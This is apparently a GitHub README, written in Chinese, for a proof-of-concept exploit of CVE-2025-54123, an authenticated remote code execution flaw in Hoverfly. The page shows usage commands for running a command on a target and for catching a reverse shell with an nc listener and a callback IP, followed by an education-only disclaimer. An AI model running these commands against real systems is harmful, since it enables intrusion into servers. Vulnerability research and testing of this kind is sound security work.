davidzzo23/CVE-2025-54123
GitHub: davidzzo23/CVE-2025-54123
针对 Hoverfly 服务模拟平台的认证后远程代码执行漏洞(CVE-2025-54123)的 PoC 利用脚本,支持命令执行与反弹 Shell。
Stars: 0 | Forks: 0
# CVE-2025-54123
Hoverfly CVE 远程代码执行 (RCE)
## 使用方法
命令执行:
```
python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -c whoami
```
反弹 Shell:
```
nc -lvnp 443
```
```
python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -r $IP 443
```
## 免责声明
此脚本仅用于教育目的。未经授权在未获许可的系统上使用此漏洞利用程序是违法行为。作者对因使用此漏洞程序而导致的任何滥用或损害不承担任何责任。
标签:CISA项目, CVE, CVE-2025-54123, Hoverfly, Maven, PoC, Python, RCE, 反弹Shell, 命令执行, 安全测试, 攻击性安全, 数字签名, 数据展示, 无后门, 暴力破解, 漏洞验证, 红队, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护